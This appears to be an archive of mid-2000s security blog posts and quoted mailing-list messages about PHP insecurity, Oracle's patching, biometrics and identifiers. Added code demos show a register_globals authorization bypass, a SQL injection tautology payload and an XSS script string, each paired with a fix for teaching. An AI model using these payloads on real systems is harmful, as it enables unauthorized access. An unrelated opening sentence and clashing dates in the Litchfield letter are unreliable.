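The point of the structure is the refusal in next_block(): the generator never emits output it has not paid for in credited input entropy, which is what distinguishes this design from a seeded pseudo-random generator.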


I dug this out for additional evidence of how PHP gives programmers too much rope to hang themselves, not unlike C.

-J

-----Original Message-----
From: David Wheeler [mailto:dwheeler@ida.org]
Sent: Wednesday, August 08, 2001 2:06 PM
To: me
Subject: PHP

Ben Ford said:

>>Don't call it a weakness of the language, call it by its true name:
>> Lazy Programming.

If this was a common problem in other languages, I might agree with you.
But it's not. Essentially all other computer languages do _NOT_ let
attackers set the state of arbitrary program variables to arbitrary
values, and then require programmers to constantly reset
values if they'd like to prevent attackers from controlling them.

I'm not saying that PHP is some horrible, unfixable language.
I've posted to PHP-DEV a relatively simple set of changes that would
make it possible to eliminate the problem, and others have proposed
other approaches. And those who can control their PHP configuration can
obviously do so and eliminate the problem right now for their
applications.

Yes, you can write secure applications in PHP. But it requires
herculean effort. It's "obvious" when the application is small
that some variable needs to be unset, that's true, assuming you know to
look.
But once you call functions, you have to have global knowledge of all
global values that the function uses, including the complete transitive
closure of all functions it calls directly & indirectly -- and that
INCLUDES the implementation of the library functions you call. And you have to
redo the analysis when you use a new version of PHP. You could argue
that all PHP developers do this... but I wouldn't believe you.

It's certainly true that all languages have "gotchas".
This one is larger than most (in my opinion), though. And we should be
striving in our computer languages to make it easy, not hard, to write
secure programs.

If some application can be used securely in theory, but its user
interface is so hard to use that it cannot PRACTICALLY be used securely,
then it's still insecure. I argue that the same is true for programming languages.
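
As an added example (not part of Wheeler's message), here is the pattern he is describing in runnable PHP. register_globals was removed in PHP 5.4, so the script simulates it with extract() over a constructed query-string array; the credential check, the user name and the password are stand-ins chosen for the demo.

```php
<?php
// Added example, not from the quoted e-mail: the register_globals hazard
// Wheeler describes, and the two habits that close it. register_globals was
// removed in PHP 5.4, so this CLI demo simulates it with extract() over a
// constructed query-string array. The user name, password and variable
// names are stand-ins chosen for the demo.

declare(strict_types=1);

/** Stand-in for a real credential check. */
function password_is_valid(string $user, string $pass): bool
{
    return $user === 'admin' && $pass === 's3cret';
}

/**
 * Vulnerable: $authorized is only ever assigned on success. With
 * register_globals=On a request such as ?user=admin&authorized=1 has
 * already created that variable before this code runs, so the check is
 * bypassed without a password.
 */
function vulnerable_access(array $query): bool
{
    extract($query);                     // simulates register_globals=On
    if (password_is_valid($user ?? '', $pass ?? '')) {
        $authorized = true;
    }
    return !empty($authorized);
}

/**
 * Fixed: every variable that gates a decision is initialised before any
 * request data is consulted, and request data is read only from the
 * explicit array ($_GET/$_POST in a real script; $query here), never
 * from the global namespace.
 */
function safe_access(array $query): bool
{
    $authorized = false;                 // the request can never pre-set this
    $user = (string) ($query['user'] ?? '');
    $pass = (string) ($query['pass'] ?? '');
    if (password_is_valid($user, $pass)) {
        $authorized = true;
    }
    return $authorized;
}

// Constructed requests: one legitimate, one carrying no password at all.
$legit  = ['user' => 'admin', 'pass' => 's3cret'];
$attack = ['user' => 'admin', 'authorized' => '1'];

foreach (['legit' => $legit, 'attack' => $attack] as $label => $query) {
    printf("%-7s vulnerable=%s safe=%s\n",
        $label,
        var_export(vulnerable_access($query), true),
        var_export(safe_access($query), true));
}
```

vulnerable_access() grants the password-less request because the request itself created $authorized before the check ran; safe_access() denies it, since the flag is initialised first and input is read only from the explicit array. This is the "constantly reset values" burden Wheeler objects to: every decision variable in every function, including library code, has to be defended this way.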


I've been wondering lately whether PHP is much like C from a security perspective: the chances that your PHP application is secure depend on tribal knowledge of "what not to do" with the basic language. Put another way, like C, PHP gives you plenty of rope to hang yourself if you don't know what you are doing, which is unfortunate for a language that should be safer by default for use by UI programmers.

This posting from Andrew van der Stock brings up some specific changes to the PHP language that could really help improve security, in the same way that GCC compiler warnings about insecure functions help with awareness.

-----Original Message-----
From: Andrew van der Stock [mailto:vanderaj@greebo.net]
Sent: Friday, June 24, 2005 10:07 PM
To: Benjamin Livshits
Cc: webappsec@securityfocus.com
Subject: Re: Languages/platforms used for Web apps. Any stats?

I don't know of any stats, but if anyone was to make a study, that's
where I'd focus.

However, saying that:

* I review J2EE finance apps used in very large institutions. I find
plenty of problems which need fixing
* I look after a PHP forum, which definitely could improve
* In my previous job, the most vulnerable app I ever reviewed was
written in ASP in VBScript

I don't think the language has much to do with it beyond basic security
posture. PHP could do a lot to redress the problems, for example, by:

* making echo do htmlentities by default, and having a special echo /
print which doesn't in case you really meant to spit out HTML
* deprecating the old function based MySQL drivers (i.e. warnings when
E_ALL is used) in favor of the MySQLi drivers or PDO which have prepared
statements
* in the next version of PHP, remove support for register_globals and
make url_fopen permanently false
* Remove implicit declarations and add optional strong typing which
really means it

The basic security posture of PHP has been improving, but honestly, it
really depends on the quality of the coders and if they are aware of the
security options open to them. The other thing is that there is a lot of
PHP code out there written in the PHP 3 days which sorta runs okay on
PHP 4 and 5, which shouldn't. PHP 3 really was a security nightmare -
everything in the interpreter was set to be the most insecure possible
posture with maximal attack surface area.
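
As an added example (not part of van der Stock's message), two of the changes he proposes can be applied at application level today without waiting for the language: an escaping-by-default output helper, and prepared statements via PDO instead of string-built SQL. The script assumes the pdo_sqlite extension; the users table, its rows and the injected string are constructed for the demo.

```php
<?php
// Added example, not from the quoted e-mail: two of the proposals above
// applied in application code, since the language does not make them the
// default. Assumes the pdo_sqlite extension; the table, its rows and the
// injected string are constructed for the demo.

declare(strict_types=1);

/** Escaping-by-default output: use e() everywhere; emit raw HTML only deliberately. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Raw output, named so the intent is visible in code review. */
function raw_html(string $html): string
{
    return $html;
}

/** The old pattern: string-built SQL, so attacker text becomes SQL syntax. */
function lookup_user_unsafe(PDO $db, string $name): array
{
    $sql = "SELECT id, name FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** The proposed pattern: a prepared statement, so attacker text stays data. */
function lookup_user_safe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");

// A classic tautology: with string concatenation the WHERE clause becomes
// name = 'x' OR '1'='1' and matches every row; the prepared statement looks
// for a user literally named  x' OR '1'='1  and matches none.
$injected = "x' OR '1'='1";
printf("unsafe rows: %d\n", count(lookup_user_unsafe($db, $injected)));
printf("safe rows:   %d\n", count(lookup_user_safe($db, $injected)));

// Output side: the same untrusted string rendered escaped, and a deliberate
// raw-HTML wrapper whose untrusted interior is still escaped.
$payload = '<script>alert(1)</script>';
echo e($payload), "\n";
echo raw_html('<b>' . e($payload) . '</b>'), "\n";
```

The naming is the point of the first half: when the escaping function is the short, default one and the raw one has to be asked for by name, a reviewer can grep for raw_html() and check each call, which is exactly the posture van der Stock wants echo itself to have.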


Some interesting results found in a study of 2000-2004 election data.

We first show that there is a positive correlation between use of touch-screen voting and the level of electoral support for George Bush. This is true in models that compare the 2000-2004 changes in vote shares between adopting and nonadopting counties within a state, after controlling for income, demographic composition, and other factors. Although small, the effect could have been large enough to influence the final results in some closely contested states.

They also found:

Touch-screen voting could also indirectly affect vote shares by influencing the relative turnout of different groups. We find that the adoption of touch-screen voting has a negative effect on estimated turnout rates, controlling for state effects and a variety of county-level controls.

This is not so much about Islam vs. Christianity (although I think a lot of wacky Christians are still making this case). Courtesy of Bruce Schneier.

An absolutely fascinating interview with Robert Pape, a University of Chicago professor who has studied every suicide terrorist attack since 1980. "The central fact is that overwhelmingly suicide-terrorist attacks are not driven by religion as much as they are by a clear strategic objective: to compel modern democracies to withdraw military forces from the territory that the terrorists view as their homeland."



Financial Cryptography: "Acceptable Risk" - a Euphemism for Selling Fraud?

This is a post from a while back but is still relevant to recent discussions about how the financial industry keeps shifting the burden of identity theft and fraud to the customers. Bruce Schneier just wrote about this in regards to phishing in the most recent edition of Crypto-Gram as well.

The "acceptable risk" concept [writes guest financial cryptographer Ed Gerck] that appears in recent threads has been for a long time a euphemism for that business model that shifts the burden of fraud to the customer.

The dirty little secret of the credit card industry is that they are very happy with 10% of credit card fraud, over the Internet or not.

In fact, if they would reduce fraud to zero today, their revenue would decrease as well as their profits. So, there is really no incentive to reduce fraud. On the contrary, keeping the status quo is just fine.


InformationWeek > Biometric Security > Privacy Concerns, Expense Keep Biometrics Out Of U.S. ATMs > October 12, 2005

This article is chock full of fun things to comment on.

Ricardo Prieto, who was vice president for system operations at BanCafe when the system was installed, said that at first ATMs failed to recognize fingerprints on the well-worn hands of some elderly customers and laborers such as construction workers.

He said the ATM imaging was improved, and the number of customers whose fingerprints couldn't be read fell from 30 percent to 8 percent.

Wow, that is great progress! Now for a large bank, only 2 million instead of 7.5 million customers will not be able to use my bank's ATMs! Where do I sign?

"Biometrics is certainly the most secure form of authentication," said Avivah Litan, an analyst with Gartner Inc., a Stamford, Conn.-based technology analysis firm. "It's the hardest to imitate and duplicate."

Litan is right. It is very difficult to "imitate and duplicate" biometrics in ways that could fool sensors.

I would also argue that biometrics are not the most secure form of authentication. Smart cards and tokens are also hard to imitate and duplicate, and in general that isn't even a threat model to worry about, because in practice nobody uses such a token as the only factor. They are used as part of a two-factor authentication system, which is really a much more secure form. For some bizarre reason, biometric holy-grail folks (mostly vendors, I imagine) think that biometrics don't need a second factor. Additionally, there are a nonzero False Acceptance Rate and False Reject Rate (as noted beautifully above) that make biometrics fail in many real-world scenarios. Smart cards don't have that problem.

"The real holy grail in biometrics," said Jim Block, Diebold's director of global advanced technology, "is let's get rid of the PIN so no one has anything to steal anymore."

Let's think about that for a minute. Let's ignore for a moment that this came from Diebold, a foremost authority in voting security. He claims that without a PIN, there would be nothing to steal anymore. Really?

Actually, having a PIN or another second factor can help to thwart these kinds of "steal the biometric" attacks since the biometric by itself is rendered useless. It certainly won't eliminate the threat, but I think it would reduce the likelihood that someone would violently extract the biometric to steal something since they need you alive anyhow to get the PIN or password.


Funny and entertaining and sad rant about Oracle's inability to do security in stark contrast to public claims by their CSO, marketing, etc.

This has inspired others to note, among other comments, that some Oracle vulnerabilities have been open for 768 days!! Oracle even tried to put the cat back in the bag on some other disclosed vulnerabilities recently. They just don't get it. I wonder, if Larry Ellison were in Bill Gates's place, just how much worse off the Internet and the world would be from a security perspective.

---------- Forwarded message ----------
From: David Litchfield
To: bugtraq@private, ntbugtraq@private
Date: Thu, 6 Jan 2005 16:01:26 -0000
Subject: Opinion: Complete failure of Oracle security response and utter neglect of their responsibility to their customers

Dear security community and Oracle users,

Many of my customers run Oracle. Much of the U.K. Critical National
Infrastructure relies on Oracle; indeed this is true for many other
countries as well. I know that there's a lot of private information
about me stored in Oracle databases out there. I have good reason,
like most of us, to be concerned about Oracle security; I want Oracle
to be secure because, in a very real way, it helps maintain my own
personal security. As such, I am writing this open letter.

Extract from interview between Mary Ann Davidson and IDG
http://www.infoworld.com/article/05/05/24/HNoraclesecurityhed_1.html

IDGNS: "What other advice do you have for customers on security?"

Davidson: "Push your vendor to tell you how they build their software
and ask them if they train people on secure coding practices. "

Now some context has been put in place I can continue.

On the 31st of August 2004, Oracle released a security update (Alert
68 [ http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf ])
to address a large number of major security flaws in their database
server product. The patches had been a long time in coming
[ http://www.eweek.com/article2/0,1759,1637213,00.asp ] and we fully
expected that these patches would actually fix the problems but,
unfortunately this is not the case. To date, these flaws are still not
fixed and are still fully exploitable. I reported this to Oracle a
long time ago.

The real problem with this is not that the flaws Alert 68 supposedly
fixed are still exploitable, but rather the approach Oracle took in
attempting to fix these issues. One would expect that, given the
length of time they took to deliver, these security "fixes" would be
well considered and robust; fixes that actually resolve the security
holes. The truth of the matter though is that this is not the case.

Some of Oracle's "fixes" simply attempt to stop the example exploits I
sent them for reproduction purposes. In other words the actual flaw
was not addressed and with a slight modification to the exploit it
works again. This shows a slapdash approach with no real consideration
for fixing the actual problem itself.

As an example of this, Alert 68 attempts to fix some security holes in
some triggers; the flaws could allow a low privileged user to gain SYS
privileges - in other words gain full control of the database server.
The example exploit I sent to Oracle contained a space in it. Oracle's
fix was to ignore the user's request if the input had a space. What
Oracle somehow failed to see or grasp was that no space is needed in
the exploit. This fix suggests no more than a few minutes of thought
was given to the matter. Why did it take 8 months for this? Further,
how on earth did this get through QA? More, why are we still waiting
for a proper fix for this?

Here is another class of thoughtless "fix" implemented by Oracle in
Alert 68. Some Oracle PL/SQL procedures take an arbitrary SQL
statement as a parameter which is then executed. This can present a
security risk. Rather than securing these procedures properly Oracle
chose a security through obscurity mechanism. To be able to send the
SQL query and have it executed one needs to know a passphrase. This
passphrase is hardcoded in the procedure and can be extracted with
ease. So all an attacker needs to do now is send the passphrase and
their arbitrary SQL will still be executed.

In other cases Oracle have simply dropped the old procedures and added
new ones - with the same vulnerable code!

I ask again, why does it take two years to write fixes like this?
Perhaps the fixes take this long because Oracle pore through their
code looking for similar flaws? Does the evidence bear this out? No -
it doesn't. In those cases where a flaw was fixed properly, we find
the same flaw a few lines further down in the code. The DRILOAD
package "fixed" in Alert 68 is an example of this; and this is not an
isolated case. This is systemic. Code for objects in the SYS, MDSYS,
CTXSYS and WKSYS schemas all have flaws within close range of "fixed"
problems. These should have been spotted and fixed at the time.

I reported these broken fixes to Oracle in February 2005. It is now
October 2005 and there is still no word of when the "real" fixes are
going to be delivered. In all of this time Oracle database servers
have been easy to crack - a fact Oracle are surely aware of.

What about the patches since Alert 68 - the quarterly Critical Patch
Updates? Unfortunately it is the same story. Bugs that should have
been spotted left in the code, brand new bugs being introduced and old
ones reappearing.

This is simply NOT GOOD ENOUGH. As I stated at the beginning of this
letter, I'm concerned about Oracle security because it impinges upon
me and my own personal security.

What is apparent is that Oracle has no decent bug
discovery/fix/response process; no QA, no understanding of the
threats; no proactive program of finding and fixing flaws. Is anyone
in control over at Oracle HQ?

A good CSO needs to be more than just a mouthpiece. They need to be able
to deliver and execute an effective security strategy that actually
deals with problems rather than sweeping them under the carpet or
waste time by blaming others for their own failings. Oracle's CSO has
had five years to make improvements to the security of their products
and their security response but in this time I have seen none. It is
my belief that the CSO has categorically failed. Oracle security has
stagnated under her leadership and it's time for change.

I urge Oracle customers to get on the phone, send an email, demand a
better security response; demand to see an improvement in quality.
It's important that Oracle get it right. Our national security depends
on it; our companies depend on it; and we all, as individuals depend
on it.

Cheers,
David Litchfield


The Seattle Times: Business & Technology: Glitch forces fix to cockpit doors

Well, "Open Sesame" works if you say it through a nearby walkie-talkie:

For more than two years, U.S. airplane passengers have flown more securely because high-tech cockpit doors created a barrier to prevent a repeat of 9/11, when terrorists entered the cockpit and commandeered four planes.

But, the doors were not foolproof.

In December 2003, a Northwest Airlines maintenance mechanic inside an Airbus A330 jet on the ground in Minneapolis pushed the microphone button to talk into his handheld radio. Though he hadn't touched the cockpit door, he heard the sound of its lock operating.

So, other on-board avionics and electronics have to meet strict EMI standards to get on an airplane, but not the new cockpit doors??? Let me guess, the Bush Administration and Congress exempted this new equipment from typical safety and other regulations after 9-11, since those aren't important when there are terrorists out there?


Usable Security Blog Archive O’Reilly Book: Security and Usability

One of the research areas that I am very interested in:

O’Reilly has released Security and Usability: Designing Secure Systems That People Can Use, a collection of 34 essays on security and usability edited by Lorrie Cranor and Simson Garfinkel.

Firewalls a dangerous distraction says expert

I don't know who Abe Singer is, but he makes a great point that I have been touting for years. Look at your infosec program and count how many people you have dealing directly with firewalls. Now count how many people you have dealing with application security audits, standards, reviews, etc. More than likely, you only need one hand to count the latter. That is why there is such a problem with insecure applications on the Internet. It starts with misunderstanding your threat model and continues with inadequate staffing and misplaced priorities.

A preoccupation with firewalls is diverting attention and resources away from the more important issue of locking systems down, according to an expert.

Computer security researcher at the San Diego Supercomputing Center
(SDSC), Abe Singer said companies can spend 90 percent of their security
efforts on firewalls and not much of anything else. "I'm not saying
firewalls are completely irrelevant, but how much effort do you spend on
security?" Singer asked. "Do security at the host, not just the
perimeter. You should be worried about what users are doing, because if
an attacker is going through the perimeter [without secure hosts] then
it's game over."


As the REAL ID act meets reality, recall a previous report on DMV fraud and lax security. If you think you have problems budgeting for security in your company, imagine being handed an unfunded mandate from the federal government. Do you think current problems will magically go away?

Date: Mon, 2 Feb 2004 09:50:52 -0500
From: Monty Solomon
Subject: Security Holes at DMVs Nationwide Lead to ID Theft and Safety Concerns

CDT (http://www.cdt.org/) has issued a report entitled "Unlicensed
Fraud"
(http://www.cdt.org/privacy/20040200dmv.pdf) documenting rampant
internal fraud and lax security at state motor vehicle administration
offices across the country, placing the reliability of all driver's
licenses at risk. While heavy public attention has been placed on new
national standards and new technologies for driver's licenses, studying
local news reports from throughout 2003 CDT finds that basic management
processes to stop bribery and theft are lacking. In the report, CDT
offers policy recommendations to address this dire issue. February 2,
2004


From a posting to the cryptography mailing list, with some interesting statistics in the presentation. Update your threat models!

Folks might want to look at http://www.huitema.net/talks/ietf63-security.ppt the slides from a talk Christian Huitema gave at the Applications Area at IETF63 this past week. Of particular interest is just how cheap it is to brute-force a passphrase these days, especially if it's just used as a cryptographic key with known plaintext (i.e., in challenge/ response protocols).

--Steven M. Bellovin, http://www.cs.columbia.edu/~smb


Glad I'm sticking with the Neuros which doesn't run Windows now and
will run Linux in the next version. Not to mention the open source aspects and the ability to play OGG/Vorbis audio files...

http://rss.slashdot.org/Slashdot/slashdot?m=251

Spammers and people without regard for your privacy or your privacy preferences (blocking cookies means I don't want them in any form) are insidious. Unbeknownst to many people, Macromedia Flash player allows surreptitious cookies to be dropped on your computer that can be used to track you even if you block traditional browser cookies. Some information on eradicating them:

* Firefox extension for blocking Flash cookies: http://www.yardley.ca/objection/
* Macromedia info (opens the hidden Flash config tool in your browser that lets you view and expunge Flash cookies): http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html
* EPIC Flash Cookie page: http://www.epic.org/privacy/cookies/flash.html

In this article, "OSS means slower patches", David Sykes from Symantec makes some absurd claims about open source being slower to patch than closed source.

"It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window."

So... "commercial imperative" is a requirement to be quick with patches? Where has this guy been for the past 10+ years, when commercial vendors have done everything to thwart publication of vulnerabilities and have been the slowest to patch (and still are, such as Oracle and Cisco)?

Also, "I'm sure [relying on the goodwill and best efforts of many people] is part of what is causing the blow-out in the patch window" is entirely a statement of opinion. There are actual people with actual data working on the Mozilla project whom the reporter, or even Mr Sykes, could have asked. But no, they went with the unsubstantiated opinion of a purported expert on the matter instead.

Of course, Mr Sykes has a vested interest in maintaining a level of fear in users to keep buying Symantec products to protect them.

Fortunately, the Mozilla organization has hit back with the facts: Mozilla hits back at browser security claim

He also argued that, according to security company Secunia's statistics, the Microsoft vulnerabilities were more critical, and had been so over a longer timescale. In the period 2003 to 2005 Secunia have issued 22 security advisories regarding Firefox 1.x, and rate it as "less critical". In the same period Microsoft Internet Explorer 6.x had 85 Secunia advisories, and is rated as "highly critical".

"Basically their vulnerabilities are more critical. With Firefox — yeah, you have holes, but they're much less serious." Nitot likened the differences between Firefox and IE vulnerabilities as being like injuries: "Which would you prefer, to have a broken finger, or your head ripped off?"


A book that I am reading right now:

Between Silk and Cyanide, a true story of cryptography in the field during WWII.

A free 900 page eBook from Microsoft Press: Improving Web Application Security: Threats and Countermeasures

You may want to just buy a paper copy since it weighs in at 3-4 inches of paper (I have a copy of the "real" book and it's big).

Another book that sounds interesting:

Secrets of Computer Espionage: Tactics and Countermeasures

"Covers electronic and wireless eavesdropping, computer surveillance, intelligence gathering, password cracking, keylogging, data duplication, black bag computer spy jobs, reconnaissance, risk assessment, legal issues, and advanced spying techniques used by the government.

Author shares easily-implemented countermeasures against spying to detect and defeat eavesdroppers and other hostile individuals.

Addresses legal issues, including the U.S. Patriot Act, legal spying in the workplace, and computer fraud crimes."


Repeat after me: Identifiers are not Authenticators.

  • SSN: Identifies you, does not prove your identity. This is a claimed identity on its own.
  • Credit/debit Card Number: Identifies your credit card account, does not prove your identity. Possession or presentment does not prove that the presenter of this information is authorized to make use of it. But that doesn't stop the financial industry from using it as the payment authenticator...
  • ACH/Bank account and routing numbers: Identifies your bank account (along with the type, checking or savings). Again, possession or presentment does not prove that the presenter of this information is authorized to make use of it. Realize that you give this out to everyone and anyone if you send out checks since all the information to transfer money in or out of your account is right there on the check.
  • ITIN: From the IRS website:
    Are ITINs valid for identification? No. ITINs are not valid identification outside the tax system. Since ITINs are strictly for tax processing, IRS does not apply the same standards as agencies that provide genuine identity certification. ITIN applicants are not required to apply in person, and IRS does not further validate the authenticity of identity documents. ITINs do not prove identity outside the tax system, and should not be offered or accepted as identification for non-tax purposes.

So, because of this mess, you need to know how to protect yourself. Know your rights about bank account fraud.

Perry Metzger's recent posting to the cryptography mailing list about the problems of financial fraud was spot on:

John Denker writes:

> My point here is that knowing who I am shouldn't be a
> crime, nor should it contribute to enabling any crime.
> Suppose you know who I am. Suppose you know my date of
> birth, social security number, and great-great-grandmother's
> maiden name. As Spike said, so what?

I tend to agree. It is equally ridiculous to use a credit card account
number as the "secret" to authorize a transaction, since that "secret"
has to be given out several times a day.

> It's only a problem if somebody uses that _identifying_
> information to spoof the _authorization_ for some
> transaction.

Yes.

> And that is precisely where the problem lies. Any
> system that lets _identification_ serve as _authorization_
> is so incredibly broken that it is hard to even discuss
> it. I don't know whether to laugh or cry.

Again, yes.

However, I would like to make one small subtle point. In fact, what
you are complaining about is not the use of identification for
authorization -- that is a totally separate and equally sad discussion
-- but the use of widely known pieces of information about
someone to identify them. The issue is that the bank pretends only you
would know your mother's maiden name, not that the bank would only let
you withdraw funds. A piece of information that is not widely known
but which can be used to establish your identity -- such as a private
key only you should know -- is probably fine.

So, rephrasing, the problem is not that secret information isn't a
fine way to establish trust -- it is the pretense that SSNs, your
mom's birth name or even credit card numbers can be kept secret.

> Identifying information cannot be kept secret.

I'd amend that to "things like your name, your SSN or your account
numbers cannot be kept secret..."

> There's no point in trying to keep it secret. Getting a new SSN
> because the old one is no longer secret is like bleeding with
> leeches to cure scurvy ... it's completely the wrong approach. The
> only thing that makes any sense is to make sure that all relevant
> systems recognize the difference between identification and
> authorization.

I have to agree yet again (with my caveats about the terminology you
are using).

This is yet more reason why I propose that you authorize transactions
with public keys and not with the use of identity information. The
identity information is widely available and passes through too many
hands to be considered "secret" in any way, but a key on a token never
will pass through anyone's hands under ordinary circumstances.

Perry
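
Perry's proposal, together with the identifier-versus-authenticator distinction above, put into code as an added example (not from the mailing-list post): a transaction carries only identifiers, and the bank accepts it only under an Ed25519 signature from the key enrolled for the account. Everything here is constructed; the account and routing numbers are made up.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// Transaction is built only from identifiers: account and routing numbers,
// payee and amount. All of them are printed on a paper check, so none is secret.
type Transaction struct {
	Account     string `json:"account"`
	Routing     string `json:"routing"`
	Payee       string `json:"payee"`
	AmountCents int64  `json:"amount_cents"`
	Nonce       string `json:"nonce"` // unique per transaction; blocks replay of a captured authorization
}

// canonical is the byte string that is signed and verified; json.Marshal
// emits struct fields in declaration order, so both sides agree on it.
func canonical(tx Transaction) ([]byte, error) {
	return json.Marshal(tx)
}

// AuthorizeByIdentifier models today's ACH model: the transaction is accepted
// if the account and routing numbers match what is on file. Anyone who has
// seen one of the customer's checks passes this test.
func AuthorizeByIdentifier(tx Transaction, routingOnFile map[string]string) bool {
	r, ok := routingOnFile[tx.Account]
	return ok && r == tx.Routing
}

// Bank is the key-based alternative: it stores one public key per account.
// The matching private key lives on the customer's token and is never sent.
type Bank struct {
	keys  map[string]ed25519.PublicKey
	spent map[string]bool // nonces already honoured
}

func NewBank() *Bank {
	return &Bank{keys: map[string]ed25519.PublicKey{}, spent: map[string]bool{}}
}

// Enroll records the public key that authorizes spending from an account.
func (b *Bank) Enroll(account string, pub ed25519.PublicKey) { b.keys[account] = pub }

var (
	ErrUnknownAccount = errors.New("no key enrolled for account")
	ErrBadSignature   = errors.New("signature does not verify under the enrolled key")
	ErrReplay         = errors.New("nonce already used")
)

// Authorize accepts tx only if it is signed by the key enrolled for
// tx.Account and has not been presented before. Knowing the identifiers
// (account, routing, SSN, mother's maiden name) contributes nothing here.
func (b *Bank) Authorize(tx Transaction, sig []byte) error {
	pub, ok := b.keys[tx.Account]
	if !ok {
		return ErrUnknownAccount
	}
	msg, err := canonical(tx)
	if err != nil {
		return err
	}
	if len(sig) != ed25519.SignatureSize || !ed25519.Verify(pub, msg, sig) {
		return ErrBadSignature
	}
	if b.spent[tx.Nonce] {
		return ErrReplay
	}
	b.spent[tx.Nonce] = true
	return nil
}

// Sign is what the customer's token does: sign the canonical transaction.
func Sign(priv ed25519.PrivateKey, tx Transaction) ([]byte, error) {
	msg, err := canonical(tx)
	if err != nil {
		return nil, err
	}
	return ed25519.Sign(priv, msg), nil
}

func main() {
	// Constructed sample data; the account and routing numbers are made up.
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	bank := NewBank()
	bank.Enroll("123456789", pub)
	tx := Transaction{Account: "123456789", Routing: "999999999", Payee: "Utility Co", AmountCents: 12500, Nonce: "n-1"}
	// Identifier-only check: passes for the customer and for anyone holding a copy of a check.
	fmt.Println("identifier check:", AuthorizeByIdentifier(tx, map[string]string{"123456789": "999999999"}))
	sig, _ := Sign(priv, tx)
	fmt.Println("customer's token:", bank.Authorize(tx, sig))           // <nil>
	fmt.Println("same authorization replayed:", bank.Authorize(tx, sig)) // nonce already used
	_, otherPriv, _ := ed25519.GenerateKey(rand.Reader)                  // a stranger who knows every identifier
	tx2 := tx; tx2.Nonce = "n-2"
	forged, _ := Sign(otherPriv, tx2)
	fmt.Println("stranger with identifiers:", bank.Authorize(tx2, forged)) // signature does not verify
}
```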

First out of the gate:

FedEx sued a loyal customer for posting photos of furniture he made for himself out of FedEx boxes on the web. Get this, they used many...er...novel...legal arguments to try to scare him. Welcome to the doghouse FedEx. You've got great company, such as Cisco and Oracle.

Some highlights:

  • They tried to use the DMCA in their claims. But were complaining about trademark issues. Copyright law does not cover trademarks. Next!
  • They tried to make some claim that he was violating the terms of service of fedex.com in his use of the boxes.
  • They tried to claim that he was obviously posting the photos for personal financial gain. Get this--because he posted them to a .com website instead of a .net. Good thing I'm on a .net so they can't sue me!

Furniture Causes FedEx Fits

Also in the WTF files. A Doonesbury strip was recently pulled for using a real, albeit crude, nickname for Karl Rove. The papers claimed it was "in bad taste".

Some pull 'Doonesbury' over Rove moniker

The strip itself:
http://www.doonesbury.com/strip/dailydose/index.html?uc_full_date=20050726

Next on the list. Jason Coombs had a great rant on Bugtraq about computer forensics professionals who are testifying against defendants who may well have a legitimate defense, the "trojan ate my homework" defense. He takes issue with claims that a forensics investigation could reasonably ascertain whether a past action was performed by a human or by a trojan horse or other malware:

The fact that malware authors aren't cooperating with the computer forensics industry by making sure that it's easy to distinguish between the actions of malware and the actions of a human computer user, combined with uninformed expert opinions like those shown below, is resulting in innocent people being put behind bars, and people like Marcus Lawson who think they know what they're doing but clearly do not are helping to get innocent people convicted by spewing nonsense. This undermines the ability of the criminal court system to convict those who are truly guilty, and keep them convicted on appeal.

And finally, how many laws do you have to break to get fired in the Department of Homeland Security? Since this ran, we have learned that the DHS has deleted the data that it illegally obtained from data miners. So now Americans have no way of knowing whether the TSA used data about them illegally. A group from Alaska is now suing the government.

This will be something to look forward to. I have not seen much of the theory of threat modeling end-to-end put into practice effectively or completely. And much of what I have seen of threat modeling really should be baked into the SDLC process and something that project teams do as part of normal development efforts (why are security people doing separate data flow diagrams, for example?).

From Threatsandcountermeasures:

The next release of the OWASP Web Application Penetration Test (WAPT) guide will include a section on using threat modelling effectively.

Threat Modelling and security testing

That sounds like quite a deal actually. Verisign still charges an exorbitant amount of money for bits that do the same thing.

-Jason

From Peter Gutmann to the cryptography mailing list. Subject: How much for a DoD X.509 certificate?

$25 and a bit of marijuana, apparently. See:

http://www.wjla.com/news/stories/0305/210558.html
http://www.wjla.com/news/stories/0105/200474.html

Although the story doesn't mention this, the "ID" in question was the
DoD Common Access Card, a smart card containing a DoD-issued
certificate. To get a CAC, you normally have to provide two forms of
verification... in this case I guess the two were photo ID of dead
presidents and empirical proof that you know how to buy weed.

The cards were issued by Yusuf Khalil Jackson, a man with a long
criminal history (including, ironically, identity fraud):

John Pike, Global Security.org: "The notion that we're going to let
somebody with this type of criminal record, with no background check
on him and give him the ID card machine defies understanding."

Jackson admitted to making about 30 of the ID cards:

John Pike: "The good news is that it looks like some of these people
were just doing it so they could go to a bar and claim to be over 21.
The bad news is that you don't know what else some of these other
people might have done."

One of the cards was later "seized from a Pakistani national" by the
police.

Bowens: "That's the nightmare of it. The cards themselves are not
counterfeit. They're authentically made but they've been issued in an
unauthorized manner for profit or ideology or a little of both."

This sort of thing doesn't bode well for Real ID either. These cards
were real ID too.

Peter.

Getting smarter:

Chertoff is a good guy. When I heard this NPR interview I remember thinking, holy crap, someone who gets it. Security is about tradeoffs: with limited resources, you make the most cost-effective and rational decisions based on risk and threat analysis.

TSA may move to allow knives, etc. back on aircraft.
Threats Reassessed To Make Travel Easier for Public

The rule that passengers must stay seated for the first and last 30 minutes of a flight is also going away, due to reasoned analysis:
http://www.mail-archive.com/infowarrior@g2-forward.org/msg01084.html

Staying stupid:

(proposing requiring passports to enter the US from Canada)

http://www.mail-archive.com/infowarrior@g2-forward.org/msg01280.html

Looks like getting smarter may finally win out.

